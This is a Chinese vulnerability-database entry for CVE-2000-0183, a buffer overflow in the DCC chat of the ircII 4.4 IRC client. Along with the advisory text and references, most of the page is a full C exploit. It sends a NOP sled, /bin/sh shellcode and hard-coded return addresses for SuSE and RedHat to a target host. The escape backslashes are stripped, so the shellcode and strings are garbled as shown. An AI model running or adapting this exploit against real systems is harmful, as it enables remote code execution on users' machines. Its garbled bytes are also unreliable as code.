IrcII DCC Chat缓冲区溢出漏洞
| 漏洞ID | 1105746 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2000-03-10 | 更新时间 | 2005-05-02 |
![图片[1]-IrcII DCC Chat缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2000-0183 |
![图片[2]-IrcII DCC Chat缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200003-020 |
| 漏洞平台 | Linux | CVSS评分 | 5.1 |
|漏洞来源
|漏洞详情
ircII4.4版本IRC客户端存在缓冲区溢出漏洞。远程攻击者借助DCC聊天功能可以执行命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1046/info
IrcII is a well-known Internet Relay Chat (IRC) client for unix. Version 4.4-7 and possibly previous versions are known to be vulnerable to a buffer overflow condition in their direct client-to-client (DCC) chat implementation. It may be possible to execute arbitrary code on a client attempting to initiate a dcc chat. Exploitation this vulnerability could result in a remote compromise with the privileges of the user running the ircII client.
This vulnerability was present in the "port" made available with FreeBSD. It is not installed by default.
/*
ircii-4.4 exploit by bladi & aLmUDeNa
buffer overflow in ircii dcc chat's
allow to excute arbitrary
Affected:
ircII-4.4
Patch:
Upgrade to ircII-4.4M
ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz
Offset:
SuSe 6.x :0xbfffe3ff
RedHat :0xbfffe888
Thanks to : #warinhell,#hacker_novatos
Special thanks go to: Topo[lb],
Saludos para todos los que nos conozcan especialmente para eva ;)
([email protected])
*/
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
char *h_to_ip(char *hostname);
char *h_to_ip(char *hostname) {
struct hostent *hozt;
struct sockaddr_in tmp;
struct in_addr in;
if ((hozt=gethostbyname(hostname))==NULL)
{
printf(" ERROR: IP incorrectan");
exit(0);
}
memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
memcpy(&in,&tmp.sin_addr.s_addr,4);
return(inet_ntoa(in));
}
main(int argc, char *argv[])
{
struct sockaddr_in sin;
char *hostname;
char nops[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";
char *shell =
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"x80xe8xdcxffxffxff/bin/sh";
int outsocket,tnt,i;
printf (" irciismash ver: 1.0n");
printf (" by n");
printf (" bladi & aLmUDeNann");
if (argc<3)
{
printf("Usage : %s hostname portn",argv[0]);
exit(-1);
}
hostname=argv[1];
outsocket=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_port=htons(atoi(argv[2]));
sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
printf(" ERROR: El puerto esta cerradito :_(n");
exit(0);
}
printf("[1]- Nopingn [");
for(i=0;i<47;i++)
{
if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
write(outsocket,nops,strlen(nops));
}
printf("]n");
printf(" Nopedn");
printf("[2]- Injectin shellcoden");
write(outsocket,shell,strlen(shell));
usleep(999);
printf(" Injectedn");
printf("[3]- Waitingn [");
for(i=0;i<299;i++)
{
printf(".");
fflush(stdout);
usleep(99);
write(outsocket,"xff",strlen("xff"));
write(outsocket,"xbf",strlen("xff"));
write(outsocket,"xff",strlen("xe9"));
write(outsocket,"xe3",strlen("xff"));
}
printf("]n[4]- Xploit n - --(DoNe)-- -n");
close(outsocket);
}
|参考资料
来源:BID
名称:1046
链接:http://www.securityfocus.com/bid/1046
来源:REDHAT
名称:RHSA-2000:008
链接:http://www.redhat.com/support/errata/RHSA-2000-008.html
来源:BUGTRAQ
名称:20000310Fwd:ircii-4.4bufferoverflow
链接:http://archives.neohapsis.com/archives/bugtraq/2000-03/0093.html
Cisco IOS网页服务器漏洞 漏洞ID 1207116 漏洞类型 未知 发布时间 1999-03-01 更新时间 1999-03-01 CVE编号 CVE-1999-0222 CNNVD-ID CNNVD-199903-022 漏洞平台 N/A CVSS评…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666